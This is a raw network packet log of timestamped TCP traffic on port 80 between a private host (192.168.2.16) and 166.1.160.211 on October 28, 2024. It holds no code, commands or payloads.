                                                                                                                                                              Oct 28, 2024 19:46:18.293670893 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.293694019 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293744087 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.294255972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294291019 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294326067 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294359922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294363022 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.294393063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294406891 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.294429064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294461966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294486046 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.294517040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294553995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294572115 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.294589043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294624090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294646025 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.294656992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.294711113 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.327984095 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328001022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328016996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328053951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328069925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328085899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328087091 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.328102112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328119040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328149080 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.328176975 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.328691006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328759909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328798056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328814983 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.328833103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328869104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328886986 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.328903913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328938961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.328968048 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.328977108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329013109 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329025984 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.329051018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329128027 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.329385042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329421043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329456091 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329473972 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.329490900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329525948 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329547882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.329560995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329596043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329611063 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.329632044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.329680920 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.330001116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.330035925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.330069065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.330121994 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.376228094 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.436577082 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.442821980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443022013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443057060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443087101 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.443181038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443214893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443239927 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.443248987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443301916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443310022 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.443685055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443718910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443747997 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.443754911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443809032 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.443825006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443873882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443907022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443928003 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.443958044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.443990946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.444005966 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.444041014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.444075108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.444113016 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.444178104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.444228888 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.444814920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.444849968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.444883108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.444909096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.444915056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.444950104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.839282036 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.839333057 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.839418888 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.839452028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.839484930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.839508057 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.839519978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.839570999 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.840918064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.840975046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841007948 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841022968 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.841038942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841089010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841099977 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.841135979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841175079 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841181040 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.841209888 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841243982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841257095 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.841279030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841314077 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841325045 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.841346025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841379881 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841397047 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.841413021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841448069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841464996 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.841500044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841532946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841550112 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.841569901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:19.841614962 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.907960892 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:19.913465977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094052076 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094153881 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094189882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094216108 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.094332933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094383001 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094394922 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.094418049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094453096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094460964 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.094729900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094763994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094784021 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.094799042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094832897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094844103 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.094866991 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094901085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094916105 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.094933987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094968081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.094983101 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.095002890 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.095052004 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.149188042 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.157160997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.316950083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317281008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317348003 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.317353964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317389965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317439079 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.317502975 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317534924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317569971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317583084 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.317867041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317898989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317913055 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.317948103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317980051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.317996979 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.318013906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318047047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318063974 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.318083048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318125963 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.318370104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318419933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318453074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318464041 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.318483114 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318515062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318531036 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.318548918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318583965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318593979 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.318873882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318922997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318927050 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.318957090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.318984985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.319009066 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.319017887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.319052935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.319067955 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.319086075 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.319118977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.319134951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.319148064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.319180965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.319192886 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.319215059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.319248915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.319262028 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.319300890 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.319353104 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.319356918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.363513947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.363571882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.363579035 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.363605022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.363640070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.363648891 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.363672972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.363711119 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.363725901 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.422175884 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422210932 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422219992 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.422244072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422282934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422295094 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.422316074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422353029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422365904 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.422384977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422416925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422430992 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.422446012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.422489882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.423042059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423077106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423109055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423125982 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.423142910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423173904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423197985 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.423207998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423242092 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423253059 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.423278093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423310995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423326015 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.423362017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423396111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423410892 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.423430920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423464060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423479080 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.423886061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.423938990 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.424002886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424036980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424066067 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424096107 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.424098969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424133062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424144030 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.424165964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424200058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424211025 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.424233913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424269915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424280882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.424303055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424336910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424344063 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.424371958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424405098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.424412966 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.426564932 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.435683966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.435736895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.435739994 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.435770035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.435811996 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.435903072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.435936928 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.435971022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.435985088 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.436054945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436100006 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.436194897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436227083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436263084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436273098 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.436295986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436328888 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436341047 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.436362982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436413050 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.436624050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436657906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.436691046 CET8049726166.1.160.211192.168.2.16
